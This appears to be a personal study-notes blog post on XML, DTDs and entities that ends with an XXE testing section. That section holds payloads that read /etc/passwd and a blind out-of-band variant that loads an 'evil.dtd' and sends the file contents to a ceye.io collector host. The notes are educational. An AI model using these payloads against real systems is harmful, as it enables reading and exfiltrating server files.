January 1st 2019, 12:00:00 pm
Learn:http://www.w3school.com.cn/xml/xml_intro.asp
Simple note:
XML
A simple example of XML:
1
2
3
4
5
6
7
8
9
10
11
12
13
| <?xml version="1.0" encoding="ISO-8859-1 ?>
<skate>
<people grade="four">
<name>azhu</name>
<high> three board </high>
</people>
<people grade="one">
<name>threezhi</name>
<high> three board </high>
</people>
</skate>
`<!-- You should avoid use attribute of XML. -->`
|
In XML, there are five predefined entity reference(实体引用):
1
2
3
4
5
| < <
> >
& &
' '
" "
|
A example of load an XML document to XML parser(解释器) :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
<script>
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}else{
// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.open("GET","note.xml",false);
xmlhttp.send();
xmlDoc=xmlhttp.responseXML;
document.getElementById("to").innerHTML=xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue;
document.getElementById("from").innerHTML=xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue;
document.getElementById("message").innerHTML=xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue;
</script>
|
DTD
A example about DTD in XML:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| <?xml version="1.0" encoding="ISO-8859-1 ?>
<!DOCTYPE skate[
<!ELEMENT people (name, high)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT high (#PCDATA)>
]>
<skate>
<people grade="four">
<name>azhu</name>
<high> three board </high>
</people>
<people grade="one">
<name>threezhi</name>
<high> three board </high>
</people>
</skate>
|
External document declaration:
<!DOCTYPE skate SYSTEM "file_path">
PCDATA means parsed character data. The tags in the text will be handled as a flag and the entity will be expand.
CDATA means character data and it will not be expand.
In DTD , declare an element and a attribute.:
1
2
3
4
5
6
7
8
9
10
11
12
| <!ELEMENT Element_name category>
<!ELEMENT Element_name (content)>
<!ELEMENT Element_name (Elemnt1, Element2...)>
Empty Element:
<!ELEMENT Element_name, EMPTY>
An element who just have PCDATA should use #PCDATA to declare.
<!ATTLIST name type category defaults>
<!ATTLIST payment type CDATA "check">
|
DTD - Entity(实体):
A entity declare:
Internal entity:
1
2
3
4
5
6
7
8
9
|
DTD:
<!ENTITY name "value">
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
XML:
<author>&writer;©right;</author>
|
External entity:
1
2
3
4
5
6
| DTD:
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
XML:
<author>&writer;©right;</author>
|
Parameter entity:
1
2
| <!ENTITY %entity_name "value">
<!ENTITY %entity_name SYSTEM "URL">
|
Try
This is a internal entity:
1
2
3
4
5
6
7
8
9
| <?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE note[
<!ELEMENT note (name)>
<!ENTITY fuck "You">
]>
<note>
<name>&fuck;</name>
</note>
|
I don’t know why that I can’t build a xml within external entity successfully. So I wanan put it away in this time.
DIG
When there is a post , it made up by xml. And the parameter can be control. Mybe there hava a XXE vluntery.
We can use some simple xml to test it.
1
2
3
4
5
6
| <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test[
<!ENTITY foo "Testing">
]>
<parameter>&foo;</parameter>
|
If it return “Testing”. We can use another to get more information.
Normal XXE
1
2
3
4
5
| <?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<c>&test;</c>
|
Parameter entity:
1
2
3
4
5
| <?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % test SYSTEM "file:///etc/passwd">
%test;
]>
|
If the website return nothing , There is another mean to deal with this problem.
Use external entity:
XML:
1
2
3
4
5
| <?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "http://127.0.0.1/shell.dtd">
]>
<c>&test;</c>
|
DTD:
1
| <!ENTITY foo SYSTEM "file:///etc/passwd">
|
Blind XXE with ceye.io:
1
2
3
4
5
| <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>
|
We can create a dtd to get echo result(回显结果).
XML:
1
2
3
4
5
6
7
| <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>
|
DTD:
1
2
3
4
| <?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://ip.port.b182oj.ceye.io/?xml1=%payload;'>"
>%all;
|
If the XEE is exist, ceye will get a GET request.
Of course there are many means to get important and private information. But due to my ability, I wanna put it down to learn more important things.
XML in PHP:
1
2
3
4
| <?php
$xml=simplexml_load_file("note.xml");
print_r($xml);
?>
|
Reference